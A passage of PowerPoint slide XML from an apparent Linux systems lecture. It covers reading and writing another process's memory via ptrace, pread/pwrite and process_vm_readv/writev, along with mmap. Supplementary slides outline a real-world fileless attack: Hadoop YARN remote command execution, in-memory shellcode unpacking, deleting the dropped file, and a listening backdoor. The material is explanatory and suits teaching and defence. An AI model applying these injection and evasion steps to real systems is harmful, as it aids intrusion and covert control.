                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, NULL, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>off_t</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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ...; // target process address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pread</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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, &amp;value,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sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(value),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addr</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p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwrite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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, &amp;value,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sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(value),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addr</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p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PTRACE_DETACH,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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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close(</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fd</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p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The process will (and must) be stopped during this procedure, so do your reads/writes quickly and get out. The kernel will deliver the writes to the other process’ virtual memory.</a:t>
            </a:r>
          </a:p>
          <a:p>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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Write/Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10653381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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>process_vm_readv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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7073364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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>process_vm_writev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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643812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On Linux, GDB uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which has a long, undocumented history of allowing a debugger to modify non-writable sections of a process image.</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64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>GDB Allow Writes to Non-writable Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="7,903 reputation"/>
              </a:rPr>
              <a:t>Mark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3" tooltip="7,903 reputation"/>
              </a:rPr>
              <a:t>Plotnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14143296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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Supplementary Material</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600"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65</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26644461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buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>Real-world </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> Attack on Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200"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66</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22539228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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An attacker infects a Hadoop cluster by identifying the service running on a well-known port (8088) and uses Hadoop YARN unauthenticated remote command execution support to achieve runtime access on the machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The attacker copies a file containing packed malware into a temp directory and launches it.</a:t>
            </a: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67</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Scenario (1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22075957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457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malicious process unpacks the file using shellcode to allocate a new dynamic executable region of memory in the process’s own memory space and injects an executable payload into the new memory region.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malware then transfers execution to the injected ELF entry point.</a:t>
            </a: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68</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Scenario (2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20892400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457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malicious process deletes the original packed malware from disk to cover its tracks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The injected ELF payload contains a shellcode that listens for incoming TCP connections, transmitting the attacker’s instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>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69</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Scenario (3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31281843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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000"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70</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17602229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8" y="2675467"/>
            <a:ext cx="8640959" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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#include &lt;sys/</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mman.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </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void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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(void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addr</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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> length,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int</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prot</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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> flags,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int</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fd</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off_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> offset); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</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munmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(void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addr</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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
